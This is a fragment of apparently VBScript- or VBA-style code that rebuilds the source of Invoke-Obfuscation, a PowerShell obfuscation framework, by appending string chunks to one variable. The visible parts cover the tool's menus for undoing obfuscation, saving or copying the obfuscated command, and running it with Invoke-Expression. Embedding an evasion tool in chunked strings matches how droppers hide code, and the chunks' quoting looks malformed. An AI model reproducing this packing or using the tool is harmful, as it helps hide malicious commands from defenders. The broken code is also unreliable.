Ouzw = Ouzw + " Write-Host "`n`nSuccessfully res"
Ouzw = Ouzw + "et ObfuscatedCommand." -ForegroundColor Cyan
"
Ouzw = Ouzw + " }
}
ElseIf($Und"
Ouzw = Ouzw + "oObfuscationInputOptions[0] -Contains $UserInput)
"
Ouzw = Ouzw + " {
If(($Script:Obfuscat"
Ouzw = Ouzw + "edCommand -ne $NULL) -AND ($Script:ObfuscatedComma"
Ouzw = Ouzw + "nd.Length -eq 0))
{
"
Ouzw = Ouzw + " Write-Host "`n`nWARNING:" -NoNewLine -Foregr"
Ouzw = Ouzw + "oundColor Red
Write-Host " Obf"
Ouzw = Ouzw + "uscatedCommand has not been set. There is nothing "
Ouzw = Ouzw + "to undo."
}
ElseIf"
Ouzw = Ouzw + "($Script:ObfuscatedCommand -ceq $Script:ScriptBloc"
Ouzw = Ouzw + "k)
{
Write-Hos"
Ouzw = Ouzw + "t "`n`nWARNING:" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " No obfuscation has"
Ouzw = Ouzw + " been applied to ObfuscatedCommand. There is nothi"
Ouzw = Ouzw + "ng to undo."
}
Els"
Ouzw = Ouzw + "e
{
# Set Obfu"
Ouzw = Ouzw + "scatedCommand to the last state in ObfuscatedComma"
Ouzw = Ouzw + "ndHistory.
$Script:ObfuscatedC"
Ouzw = Ouzw + "ommand = $Script:ObfuscatedCommandHistory[$Script:"
Ouzw = Ouzw + "ObfuscatedCommandHistory.Count-2]
"
Ouzw = Ouzw + " # Remove the last state from ObfuscatedComman"
Ouzw = Ouzw + "dHistory.
$Temp = $Script:Obfu"
Ouzw = Ouzw + "scatedCommandHistory
$Script:O"
Ouzw = Ouzw + "bfuscatedCommandHistory = @()
"
Ouzw = Ouzw + "For($i=0; $i -lt $Temp.Count-1; $i++)
"
Ouzw = Ouzw + " {
$Script:Obfuscat"
Ouzw = Ouzw + "edCommandHistory += $Temp[$i]
"
Ouzw = Ouzw + "}
# Remove last command from "
Ouzw = Ouzw + "CliSyntax. Trim all trailing OUT or CLIP commands "
Ouzw = Ouzw + "until an obfuscation command is removed.
"
Ouzw = Ouzw + " $CliSyntaxCount = $Script:CliSyntax.Cou"
Ouzw = Ouzw + "nt
While(($Script:CliSyntax[$C"
Ouzw = Ouzw + "liSyntaxCount-1] -Match '^(clip|out )') -AND ($Cli"
Ouzw = Ouzw + "SyntaxCount -gt 0))
{
"
Ouzw = Ouzw + " $CliSyntaxCount--
"
Ouzw = Ouzw + " }
$Temp = $Script:CliSynta"
Ouzw = Ouzw + "x
$Script:CliSyntax = @()
"
Ouzw = Ouzw + " For($i=0; $i -lt $CliSyntaxCount-1"
Ouzw = Ouzw + "; $i++)
{
"
Ouzw = Ouzw + " $Script:CliSyntax += $Temp[$i]
"
Ouzw = Ouzw + " }
# Remove last command "
Ouzw = Ouzw + "from ExecutionCommands.
$Temp "
Ouzw = Ouzw + "= $Script:ExecutionCommands
$S"
Ouzw = Ouzw + "cript:ExecutionCommands = @()
"
Ouzw = Ouzw + "For($i=0; $i -lt $Temp.Count-1; $i++)
"
Ouzw = Ouzw + " {
$Script:Executio"
Ouzw = Ouzw + "nCommands += $Temp[$i]
}
"
Ouzw = Ouzw + " # If this is removing a launcher t"
Ouzw = Ouzw + "hen we must change the launcher state so we can co"
Ouzw = Ouzw + "ntinue obfuscating.
If($Script"
Ouzw = Ouzw + ":LauncherApplied)
{
"
Ouzw = Ouzw + " $Script:LauncherApplied = $FALSE
"
Ouzw = Ouzw + " Write-Host "`n`nSuccessfully "
Ouzw = Ouzw + "removed launcher from ObfuscatedCommand." -Foregro"
Ouzw = Ouzw + "undColor Cyan
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " Write-Host "`n`nSuccessfully removed last o"
Ouzw = Ouzw + "bfuscation from ObfuscatedCommand." -ForegroundCol"
Ouzw = Ouzw + "or Cyan
}
}
"
Ouzw = Ouzw + " }
ElseIf(($OutputToDiskInput"
Ouzw = Ouzw + "Options[0] -Contains $UserInput) -OR ($OutputToDis"
Ouzw = Ouzw + "kInputOptions[0] -Contains $UserInput.Trim().Split"
Ouzw = Ouzw + "(' ')[0]))
{
If(($Scri"
Ouzw = Ouzw + "pt:ObfuscatedCommand -ne '') -AND ($Script:Obfusca"
Ouzw = Ouzw + "tedCommand -ceq $Script:ScriptBlock))
"
Ouzw = Ouzw + " {
Write-Host "`n`nWARNING:"
Ouzw = Ouzw + "" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " You haven't applied any obfuscati"
Ouzw = Ouzw + "on.`n Just enter" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " SHOW OPTIONS" -NoNewLine -Fore"
Ouzw = Ouzw + "groundColor Yellow
Write-Host "
Ouzw = Ouzw + "" and look at ObfuscatedCommand."
"
Ouzw = Ouzw + "}
ElseIf($Script:ObfuscatedCommand"
Ouzw = Ouzw + " -ne '')
{
# G"
Ouzw = Ouzw + "et file path information from compound user input "
Ouzw = Ouzw + "(e.g. OUT C:\FILENAME.TXT).
If"
Ouzw = Ouzw + "($UserInput.Trim().Split(' ').Count -gt 1)
"
Ouzw = Ouzw + " {
# Get file "
Ouzw = Ouzw + "path information from user input.
"
Ouzw = Ouzw + " $UserInputOutputFilePath = $UserInput.Trim"
Ouzw = Ouzw + "().SubString(4).Trim()
Wri"
Ouzw = Ouzw + "te-Host ''
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " # Get file path information from user interact"
Ouzw = Ouzw + "ively.
$UserInputOutputFil"
Ouzw = Ouzw + "ePath = Read-Host "`n`nEnter path for output file "
Ouzw = Ouzw + "(or leave blank for default)"
"
Ouzw = Ouzw + "}
# Deciph"
Ouzw = Ouzw + "er if user input a full file path, just a file nam"
Ouzw = Ouzw + "e or nothing (default).
If($Us"
Ouzw = Ouzw + "erInputOutputFilePath.Trim() -eq '')
"
Ouzw = Ouzw + " {
# User did not in"
Ouzw = Ouzw + "put anything so use default filename and current d"
Ouzw = Ouzw + "irectory of this script.
$"
Ouzw = Ouzw + "OutputFilePath = "$ScriptDir\Obfuscated_Command.tx"
Ouzw = Ouzw + "t"
}
ElseI"
Ouzw = Ouzw + "f(!($UserInputOutputFilePath.Contains('\')) -AND !"
Ouzw = Ouzw + "($UserInputOutputFilePath.Contains('/')))
"
Ouzw = Ouzw + " {
# User input"
Ouzw = Ouzw + " is not a file path so treat it as a filename and "
Ouzw = Ouzw + "use current directory of this script.
"
Ouzw = Ouzw + " $OutputFilePath = "$ScriptDir\$($UserI"
Ouzw = Ouzw + "nputOutputFilePath.Trim())"
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " # User input is a full file p"
Ouzw = Ouzw + "ath.
$OutputFilePath = $Us"
Ouzw = Ouzw + "erInputOutputFilePath
}
"
Ouzw = Ouzw + "
# Write Obfusca"
Ouzw = Ouzw + "tedCommand out to disk.
Write-"
Ouzw = Ouzw + "Output $Script:ObfuscatedCommand > $OutputFilePath"
Ouzw = Ouzw + "
If($Script:LauncherApplied -"
Ouzw = Ouzw + "AND (Test-Path $OutputFilePath))
"
Ouzw = Ouzw + " {
$Script:CliSyntax += "
Ouzw = Ouzw + ""out $OutputFilePath"
Writ"
Ouzw = Ouzw + "e-Host "`nSuccessfully output ObfuscatedCommand to"
Ouzw = Ouzw + "" -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host " $OutputFilePath" -NoNewLine "
Ouzw = Ouzw + "-ForegroundColor Yellow
Wr"
Ouzw = Ouzw + "ite-Host ".`nA Launcher has been applied so this s"
Ouzw = Ouzw + "cript cannot be run as a standalone .ps1 file." -F"
Ouzw = Ouzw + "oregroundColor Cyan
If($En"
Ouzw = Ouzw + "v:windir) { C:\Windows\Notepad.exe $OutputFilePath"
Ouzw = Ouzw + " }
}
ElseI"
Ouzw = Ouzw + "f(!$Script:LauncherApplied -AND (Test-Path $Output"
Ouzw = Ouzw + "FilePath))
{
"
Ouzw = Ouzw + " $Script:CliSyntax += "out $OutputFilePath"
"
Ouzw = Ouzw + " Write-Host "`nSuccessfully"
Ouzw = Ouzw + " output ObfuscatedCommand to" -NoNewLine -Foregrou"
Ouzw = Ouzw + "ndColor Cyan
Write-Host " "
Ouzw = Ouzw + "$OutputFilePath" -NoNewLine -ForegroundColor Yello"
Ouzw = Ouzw + "w
Write-Host "." -Foregrou"
Ouzw = Ouzw + "ndColor Cyan
If($Env:windi"
Ouzw = Ouzw + "r) { C:\Windows\Notepad.exe $OutputFilePath }
"
Ouzw = Ouzw + " }
Else
"
Ouzw = Ouzw + " {
Write-Host "
Ouzw = Ouzw + ""`nERROR: Unable to write ObfuscatedCommand out to"
Ouzw = Ouzw + "" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " $OutputFilePath" -NoNewLine -"
Ouzw = Ouzw + "ForegroundColor Yellow
}
"
Ouzw = Ouzw + " }
ElseIf($Script:Obfusc"
Ouzw = Ouzw + "atedCommand -eq '')
{
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine -Foregr"
Ouzw = Ouzw + "oundColor Red
Write-Host " The"
Ouzw = Ouzw + "re isn't anything to write out to disk.`n Ju"
Ouzw = Ouzw + "st enter" -NoNewLine
Write-Hos"
Ouzw = Ouzw + "t " SHOW OPTIONS" -NoNewLine -ForegroundColor Yell"
Ouzw = Ouzw + "ow
Write-Host " and look at Ob"
Ouzw = Ouzw + "fuscatedCommand."
}
}
"
Ouzw = Ouzw + " ElseIf($CopyToClipboardInputOptions[0]"
Ouzw = Ouzw + " -Contains $UserInput)
{
"
Ouzw = Ouzw + " If(($Script:ObfuscatedCommand -ne '') -AND ($Sc"
Ouzw = Ouzw + "ript:ObfuscatedCommand -ceq $Script:ScriptBlock))
"
Ouzw = Ouzw + " {
Write-Host ""
Ouzw = Ouzw + "`n`nWARNING:" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " You haven't applied a"
Ouzw = Ouzw + "ny obfuscation.`n Just enter" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " SHOW OPTIONS" -NoN"
Ouzw = Ouzw + "ewLine -ForegroundColor Yellow
"
Ouzw = Ouzw + " Write-Host " and look at ObfuscatedCommand."
"
Ouzw = Ouzw + " }
ElseIf($Script:Obfus"
Ouzw = Ouzw + "catedCommand -ne '')
{
"
Ouzw = Ouzw + " # Copy ObfuscatedCommand to clipboard.
"
Ouzw = Ouzw + " # Try-Catch block introduced sin"
Ouzw = Ouzw + "ce PowerShell v2.0 without -STA defined will not b"
Ouzw = Ouzw + "e able to perform clipboard functionality.
"
Ouzw = Ouzw + " Try
{
"
Ouzw = Ouzw + " $Null = [Reflection.Assembly]::LoadWi"
Ouzw = Ouzw + "thPartialName("System.Windows.Forms")
"
Ouzw = Ouzw + " [Windows.Forms.Clipboard]::SetText($Sc"
Ouzw = Ouzw + "ript:ObfuscatedCommand)
I"
Ouzw = Ouzw + "f($Script:LauncherApplied)
"
Ouzw = Ouzw + " {
Write-Host "`n`nSuc"
Ouzw = Ouzw + "cessfully copied ObfuscatedCommand to clipboard." "
Ouzw = Ouzw + "-ForegroundColor Cyan
}
"
Ouzw = Ouzw + " Else
"
Ouzw = Ouzw + " {
Write-Host "`n`nSuc"
Ouzw = Ouzw + "cessfully copied ObfuscatedCommand to clipboard.`n"
Ouzw = Ouzw + "No Launcher has been applied, so command can only "
Ouzw = Ouzw + "be pasted into powershell.exe." -ForegroundColor C"
Ouzw = Ouzw + "yan
}
"
Ouzw = Ouzw + "}
Catch
{
"
Ouzw = Ouzw + " $ErrorMessage = "Clipboard"
Ouzw = Ouzw + " functionality will not work in PowerShell version"
Ouzw = Ouzw + " $($PsVersionTable.PsVersion.Major) unless you add"
Ouzw = Ouzw + " -STA (Single-Threaded Apartment) execution flag t"
Ouzw = Ouzw + "o powershell.exe."
If((Ge"
Ouzw = Ouzw + "t-Command Write-Host).CommandType -ne 'Cmdlet')
"
Ouzw = Ouzw + " {
"
Ouzw = Ouzw + " # Retrieving Write-Host and Start-Sleep Cmdlets "
Ouzw = Ouzw + "to get around the current proxy functions of Write"
Ouzw = Ouzw + "-Host and Start-Sleep that are overloaded if -Quie"
Ouzw = Ouzw + "t flag was used.
. ((G"
Ouzw = Ouzw + "et-Command Write-Host) | Where-Object {$_.Command"
Ouzw = Ouzw + "Type -eq 'Cmdlet'}) "`n`nWARNING: " -NoNewLine -Fo"
Ouzw = Ouzw + "regroundColor Red
. (("
Ouzw = Ouzw + "Get-Command Write-Host) | Where-Object {$_.Comman"
Ouzw = Ouzw + "dType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine
"
Ouzw = Ouzw + " . ((Get-Command Start-Sle"
Ouzw = Ouzw + "ep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) "
Ouzw = Ouzw + "2
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " Write-Host "`n`nWARNING: " -NoNewLine -"
Ouzw = Ouzw + "ForegroundColor Red
Wr"
Ouzw = Ouzw + "ite-Host $ErrorMessage
"
Ouzw = Ouzw + " If($Script:CliSyntax -gt 0) {Start-Sleep 2}
"
Ouzw = Ouzw + " }
}
"
Ouzw = Ouzw + "
$Script:CliSynt"
Ouzw = Ouzw + "ax += 'clip'
}
Els"
Ouzw = Ouzw + "eIf($Script:ObfuscatedCommand -eq '')
"
Ouzw = Ouzw + " {
Write-Host "`n`nERROR:" "
Ouzw = Ouzw + "-NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " There isn't anything to copy to you"
Ouzw = Ouzw + "r clipboard.`n Just enter" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " SHOW OPTIONS" -NoNewLin"
Ouzw = Ouzw + "e -ForegroundColor Yellow
Writ"
Ouzw = Ouzw + "e-Host " and look at ObfuscatedCommand." -NoNewLin"
Ouzw = Ouzw + "e
}
}"
Ouzw = Ouzw + "
ElseIf($ExecutionInputOptions[0] -Con"
Ouzw = Ouzw + "tains $UserInput)
{
If"
Ouzw = Ouzw + "($Script:LauncherApplied)
{
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine -"
Ouzw = Ouzw + "ForegroundColor Red
Write-Host"
Ouzw = Ouzw + " " Cannot execute because you have applied a Launc"
Ouzw = Ouzw + "her.`n Enter" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " COPY" -NoNewLine -ForeGroundColor Ye"
Ouzw = Ouzw + "llow
Write-Host "/" -NoNewLine"
Ouzw = Ouzw + "
Write-Host "CLIP" -NoNewLine "
Ouzw = Ouzw + "-ForeGroundColor Yellow
Write-"
Ouzw = Ouzw + "Host " and paste into cmd.exe.`n Or enter" -"
Ouzw = Ouzw + "NoNewLine
Write-Host " UNDO" -"
Ouzw = Ouzw + "NoNewLine -ForeGroundColor Yellow
"
Ouzw = Ouzw + " Write-Host " to remove the Launcher from Obfus"
Ouzw = Ouzw + "catedCommand."
}
E"
Ouzw = Ouzw + "lseIf($Script:ObfuscatedCommand -ne '')
"
Ouzw = Ouzw + " {
If($Script:ObfuscatedC"
Ouzw = Ouzw + "ommand -ceq $Script:ScriptBlock) {Write-Host "`n`n"
Ouzw = Ouzw + "Invoking (though you haven't obfuscated anything y"
Ouzw = Ouzw + "et):"}
Else {Write-Host "`n`nI"
Ouzw = Ouzw + "nvoking:"}
"
Ouzw = Ouzw + " Out-ScriptContents $Script:ObfuscatedCommand
"
Ouzw = Ouzw + " Write-Host ''
"
Ouzw = Ouzw + " $null = Invoke-Expression $Script:ObfuscatedComma"
Ouzw = Ouzw + "nd
}
Else {
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine -"
Ouzw = Ouzw + "ForegroundColor Red
Write-Host"
Ouzw = Ouzw + " " Cannot execute because you have not set ScriptP"
Ouzw = Ouzw + "ath or ScriptBlock.`n Enter" -NoNewline
"
Ouzw = Ouzw + " Write-Host " SHOW OPTIONS" -NoNewL"
Ouzw = Ouzw + "ine -ForegroundColor Yellow
Wr"
Ouzw = Ouzw + "ite-Host " to set ScriptPath or ScriptBlock."
"
Ouzw = Ouzw + " }
}
Else
"
Ouzw = Ouzw + " {
Write-Host "`n`nERROR:" -"
Ouzw = Ouzw + "NoNewLine -ForegroundColor Red
Wri"
Ouzw = Ouzw + "te-Host " You entered an invalid option. Enter" -N"
Ouzw = Ouzw + "oNewLine
Write-Host " HELP" -NoNew"
Ouzw = Ouzw + "Line -ForegroundColor Yellow
Write"
Ouzw = Ouzw + "-Host " for more information."
# "
Ouzw = Ouzw + "If the failed input was part of $Script:CompoundCo"
Ouzw = Ouzw + "mmand then cancel out the rest of the compound com"
Ouzw = Ouzw + "mand so it is not further processed.
"
Ouzw = Ouzw + " If($Script:CompoundCommand.Count -gt 0)
"
Ouzw = Ouzw + " {
$Script:CompoundCom"
Ouzw = Ouzw + "mand = @()
}
# Ou"
Ouzw = Ouzw + "tput all available/acceptable options for current "
Ouzw = Ouzw + "menu if invalid input was entered.
"
Ouzw = Ouzw + " If($AcceptableInput.Count -gt 1)
"
Ouzw = Ouzw + "{
$Message = 'Valid options fo"
Ouzw = Ouzw + "r current menu include:'
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " $Message = 'Valid option for current menu includ"
Ouzw = Ouzw + "es:'
}
Write-Host "
Ouzw = Ouzw + "" $Message " -NoNewLine
$Co"
Ouzw = Ouzw + "unter=0
ForEach($AcceptableOption "
Ouzw = Ouzw + "in $AcceptableInput)
{
"
Ouzw = Ouzw + " $Counter++
# Change "
Ouzw = Ouzw + "color and verbiage if acceptable options will exec"
Ouzw = Ouzw + "ute an obfuscation function.
I"
Ouzw = Ouzw + "f($SelectionContainsCommand)
{"
Ouzw = Ouzw + "
$ColorToOutput = 'Green'
"
Ouzw = Ouzw + " }
Else
"
Ouzw = Ouzw + " {
$ColorT"
Ouzw = Ouzw + "oOutput = 'Yellow'
}
"
Ouzw = Ouzw + " Write-Host $AcceptableOption -NoNewLin"
Ouzw = Ouzw + "e -ForegroundColor $ColorToOutput
"
Ouzw = Ouzw + " If(($Counter -lt $AcceptableInput.Length) -AND"
Ouzw = Ouzw + " ($AcceptableOption.Length -gt 0))
"
Ouzw = Ouzw + " {
Write-Host ', ' -No"
Ouzw = Ouzw + "NewLine
}
}
"
Ouzw = Ouzw + " Write-Host ''
}
"
Ouzw = Ouzw + "}
}
Return $UserInput.ToLower()
}
F"
Ouzw = Ouzw + "unction Show-OptionsMenu
{
<#
.SYNOPSIS
HELPER FU"
Ouzw = Ouzw + "NCTION :: Displays options menu for Invoke-Obfusca"
Ouzw = Ouzw + "tion.
Invoke-Obfuscation Function: Show-OptionsMe"
Ouzw = Ouzw + "nu
Author: Daniel Bohannon (@danielhbohannon)
Lice"
Ouzw = Ouzw + "nse: Apache License, Version 2.0
Required Dependen"
Ouzw = Ouzw + "cies: None
Optional Dependencies: None
.DESCRIPT"
Ouzw = Ouzw + "ION
Show-OptionsMenu displays options menu for In"
Ouzw = Ouzw + "voke-Obfuscation.
.EXAMPLE
C:\PS> Show-OptionsMe"
Ouzw = Ouzw + "nu
.NOTES
This is a personal project developed b"
Ouzw = Ouzw + "y Daniel Bohannon while an employee at MANDIANT, A"
Ouzw = Ouzw + " FireEye Company.
.LINK
http://www.danielbohanno"
Ouzw = Ouzw + "n.com
#>
# Set potentially-updated script-lev"
Ouzw = Ouzw + "el values in $Script:OptionsMenu before displaying"
Ouzw = Ouzw + ".
$Counter = 0
ForEach($Line in $Script:Op"
Ouzw = Ouzw + "tionsMenu)
{
If($Line[0].ToLower().Tri"
Ouzw = Ouzw + "m() -eq 'scriptpath') {$Script:OptionsM"
Ouzw = Ouzw + "enu[$Counter][1] = $Script:ScriptPath}
If("
Ouzw = Ouzw + "$Line[0].ToLower().Trim() -eq 'scriptblock') "
Ouzw = Ouzw + " {$Script:OptionsMenu[$Counter][1] = $Script:S"
Ouzw = Ouzw + "criptBlock}
If($Line[0].ToLower().Trim() -"
Ouzw = Ouzw + "eq 'commandlinesyntax') {$Script:OptionsMenu[$"
Ouzw = Ouzw + "Counter][1] = $Script:CliSyntax}
If($Line["
Ouzw = Ouzw + "0].ToLower().Trim() -eq 'executioncommands') {"
Ouzw = Ouzw + "$Script:OptionsMenu[$Counter][1] = $Script:Executi"
Ouzw = Ouzw + "onCommands}
If($Line[0].ToLower().Trim() -"
Ouzw = Ouzw + "eq 'obfuscatedcommand')
{
# On"
Ouzw = Ouzw + "ly add obfuscatedcommand if it is different than s"
Ouzw = Ouzw + "criptblock (to avoid showing obfuscatedcommand bef"
Ouzw = Ouzw + "ore it has been obfuscated).
If($Scrip"
Ouzw = Ouzw + "t:ObfuscatedCommand -cne $Script:ScriptBlock) {$Sc"
Ouzw = Ouzw + "ript:OptionsMenu[$Counter][1] = $Script:Obfuscated"
Ouzw = Ouzw + "Command}
Else {$Script:OptionsMenu[$Co"
Ouzw = Ouzw + "unter][1] = ''}
}
If($Line[0].ToLo"
Ouzw = Ouzw + "wer().Trim() -eq 'obfuscationlength')
{
"
Ouzw = Ouzw + " # Only set/display ObfuscationLength if "
Ouzw = Ouzw + "there is an obfuscated command.
If(($S"
Ouzw = Ouzw + "cript:ObfuscatedCommand.Length -gt 0) -AND ($Scrip"
Ouzw = Ouzw + "t:ObfuscatedCommand -cne $Script:ScriptBlock)) {$S"
Ouzw = Ouzw + "cript:OptionsMenu[$Counter][1] = $Script:Obfuscate"
Ouzw = Ouzw + "dCommand.Length}
Else {$Script:Options"
Ouzw = Ouzw + "Menu[$Counter][1] = ''}
}
$Counte"
Ouzw = Ouzw + "r++
}
# Output menu.
Write-Host ""
Ouzw = Ouzw + "`n`nSHOW OPTIONS" -NoNewLine -ForegroundColor Cyan"
Ouzw = Ouzw + "
Write-Host " ::" -NoNewLine
Write-Host " "
Ouzw = Ouzw + "Yellow" -NoNewLine -ForegroundColor Yellow
Wri"
Ouzw = Ouzw + "te-Host " options can be set by entering" -NoNewLi"
Ouzw = Ouzw + "ne
Write-Host " SET OPTIONNAME VALUE" -NoNewLi"
Ouzw = Ouzw + "ne -ForegroundColor Green
Write-Host ".`n"
"
Ouzw = Ouzw + " ForEach($Option in $Script:OptionsMenu)
{
"
Ouzw = Ouzw + " $OptionTitle = $Option[0]
$OptionValu"
Ouzw = Ouzw + "e = $Option[1]
$CanSetValue = $Option[2]
"
Ouzw = Ouzw + "
Write-Host $LineSpacing -NoNewLine
"
Ouzw = Ouzw + "
# For options that can be set by u"
Ouzw = Ouzw + "ser, output as Yellow.
If($CanSetValue) {W"
Ouzw = Ouzw + "rite-Host $OptionTitle -NoNewLine -ForegroundColor"
Ouzw = Ouzw + " Yellow}
Else {Write-Host $OptionTitle -No"
Ouzw = Ouzw + "NewLine}
Write-Host ": " -NoNewLine
"
Ouzw = Ouzw + "
# Handle coloring and multi-value outpu"
Ouzw = Ouzw + "t for ExecutionCommands and ObfuscationLength.
"
Ouzw = Ouzw + " If($OptionTitle -eq 'ObfuscationLength')
"
Ouzw = Ouzw + " {
Write-Host $OptionValue -Foregro"
Ouzw = Ouzw + "undColor Cyan
}
ElseIf($OptionTitl"
Ouzw = Ouzw + "e -eq 'ScriptBlock')
{
Out-Scr"
Ouzw = Ouzw + "iptContents $OptionValue
}
ElseIf("
Ouzw = Ouzw + "$OptionTitle -eq 'CommandLineSyntax')
{
"
Ouzw = Ouzw + " # CLISyntax output.
$SetSynt"
Ouzw = Ouzw + "ax = ''
If(($Script:ScriptPath.Length "
Ouzw = Ouzw + "-gt 0) -AND ($Script:ScriptPath -ne 'N/A'))
"
Ouzw = Ouzw + " {
$SetSyntax = " -ScriptPath"
Ouzw = Ouzw + " '$Script:ScriptPath'"
}
E"
Ouzw = Ouzw + "lseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Sc"
Ouzw = Ouzw + "ript:ScriptPath -eq 'N/A'))
{
"
Ouzw = Ouzw + " $SetSyntax = " -ScriptBlock {$Script:Scrip"
Ouzw = Ouzw + "tBlock}"
}
$CommandSyntax"
Ouzw = Ouzw + " = ''
If($OptionValue.Count -gt 0)
"
Ouzw = Ouzw + " {
$CommandSyntax = " -Com"
Ouzw = Ouzw + "mand '" + ($OptionValue -Join ',') + "' -Quiet"
"
Ouzw = Ouzw + " }
If(($SetSyntax -ne '') -O"
Ouzw = Ouzw + "R ($CommandSyntax -ne ''))
{
"
Ouzw = Ouzw + " $CliSyntaxToOutput = "Invoke-Obfuscation" +"
Ouzw = Ouzw + " $SetSyntax + $CommandSyntax
Write"
Ouzw = Ouzw + "-Host $CliSyntaxToOutput -ForegroundColor Cyan
"
Ouzw = Ouzw + " }
Else
{
"
Ouzw = Ouzw + " Write-Host ''
}
}
"
Ouzw = Ouzw + " ElseIf($OptionTitle -eq 'ExecutionCommands')
"
Ouzw = Ouzw + " {
# ExecutionCommands output.
"
Ouzw = Ouzw + " If($OptionValue.Count -gt 0) {Write-Hos"
Ouzw = Ouzw + "t ''}
$Counter = 0
ForEach"
Ouzw = Ouzw + "($ExecutionCommand in $OptionValue)
{
"
Ouzw = Ouzw + " $Counter++
If($Exe"
Ouzw = Ouzw + "cutionCommand.Length -eq 0) {Write-Host ''; Contin"
Ouzw = Ouzw + "ue}
$ExecutionCommand"
Ouzw = Ouzw + " = $ExecutionCommand.Replace('$ScriptBlock','~').S"
Ouzw = Ouzw + "plit('~')
Write-Host " $($Execu"
Ouzw = Ouzw + "tionCommand[0])" -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host '$ScriptBlock' -NoNewLi"
Ouzw = Ouzw + "ne -ForegroundColor Magenta
"
Ouzw = Ouzw + " # Handle output formatting when SHOW OP"
Ouzw = Ouzw + "TIONS is run.
If(($OptionValue.Cou"
Ouzw = Ouzw + "nt -gt 0) -AND ($Counter -lt $OptionValue.Count))
"
Ouzw = Ouzw + " {
Write-Host $"
Ouzw = Ouzw + "ExecutionCommand[1] -ForegroundColor Cyan
"
Ouzw = Ouzw + " }
Else
{
"
Ouzw = Ouzw + " Write-Host $ExecutionCommand[1]"
Ouzw = Ouzw + " -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + "}
}
Write-Host ''
"
Ouzw = Ouzw + " }
ElseIf($OptionTitle -eq 'ObfuscatedComm"
Ouzw = Ouzw + "and')
{
Out-ScriptContents $Op"
Ouzw = Ouzw + "tionValue
}
Else
{
"
Ouzw = Ouzw + " Write-Host $OptionValue -ForegroundColor Mage"
Ouzw = Ouzw + "nta
}
}
}
Function Show-HelpMen"
Ouzw = Ouzw + "u
{
<#
.SYNOPSIS
HELPER FUNCTION :: Displays help"
Ouzw = Ouzw + " menu for Invoke-Obfuscation.
Invoke-Obfuscation "
Ouzw = Ouzw + "Function: Show-HelpMenu
Author: Daniel Bohannon (@"
Ouzw = Ouzw + "danielhbohannon)
License: Apache License, Version "
Ouzw = Ouzw + "2.0
Required Dependencies: None
Optional Dependenc"
Ouzw = Ouzw + "ies: None
.DESCRIPTION
Show-HelpMenu displays h"
Ouzw = Ouzw + "elp menu for Invoke-Obfuscation.
.EXAMPLE
C:\PS>"
Ouzw = Ouzw + " Show-HelpMenu
.NOTES
This is a personal project"
Ouzw = Ouzw + " developed by Daniel Bohannon while an employee at"
Ouzw = Ouzw + " MANDIANT, A FireEye Company.
.LINK
http://www.d"
Ouzw = Ouzw + "anielbohannon.com
#>
# Show Help Menu.
Wr"
Ouzw = Ouzw + "ite-Host "`n`nHELP MENU" -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or Cyan
Write-Host " :: Available" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " options" -NoNewLine -ForegroundCo"
Ouzw = Ouzw + "lor Yellow
Write-Host " shown below:`n"
Fo"
Ouzw = Ouzw + "rEach($InputOptionsList in $AllAvailableInputOptio"
Ouzw = Ouzw + "nsLists)
{
$InputOptionsCommands = "
Ouzw = Ouzw + "$InputOptionsList[0]
$InputOptionsDescript"
Ouzw = Ouzw + "ion = $InputOptionsList[1]
# Add addition"
Ouzw = Ouzw + "al coloring to string encapsulated by <> if it exi"
Ouzw = Ouzw + "sts in $InputOptionsDescription.
If($Input"
Ouzw = Ouzw + "OptionsDescription.Contains('<') -AND $InputOption"
Ouzw = Ouzw + "sDescription.Contains('>'))
{
"
Ouzw = Ouzw + "$FirstPart = $InputOptionsDescription.SubString(0"
Ouzw = Ouzw + ",$InputOptionsDescription.IndexOf('<'))
"
Ouzw = Ouzw + " $MiddlePart = $InputOptionsDescription.SubString"
Ouzw = Ouzw + "($FirstPart.Length+1)
$MiddlePart = $M"
Ouzw = Ouzw + "iddlePart.SubString(0,$MiddlePart.IndexOf('>'))
"
Ouzw = Ouzw + " $LastPart = $InputOptionsDescription.S"
Ouzw = Ouzw + "ubString($FirstPart.Length+$MiddlePart.Length+2)
"
Ouzw = Ouzw + " Write-Host "$LineSpacing $FirstPart" -N"
Ouzw = Ouzw + "oNewLine
Write-Host $MiddlePart -NoNew"
Ouzw = Ouzw + "Line -ForegroundColor Cyan
Write-Host "
Ouzw = Ouzw + "$LastPart -NoNewLine
}
Else
"
Ouzw = Ouzw + " {
Write-Host "$LineSpacing $InputOpt"
Ouzw = Ouzw + "ionsDescription" -NoNewLine
}
"
Ouzw = Ouzw + " $Counter = 0
ForEach($Command in $Inp"
Ouzw = Ouzw + "utOptionsCommands)
{
$Counter+"
Ouzw = Ouzw + "+
Write-Host $Command.ToUpper() -NoNew"
Ouzw = Ouzw + "Line -ForegroundColor Yellow
If($Count"
Ouzw = Ouzw + "er -lt $InputOptionsCommands.Count) {Write-Host ',"
Ouzw = Ouzw + "' -NoNewLine}
}
Write-Host ''
"
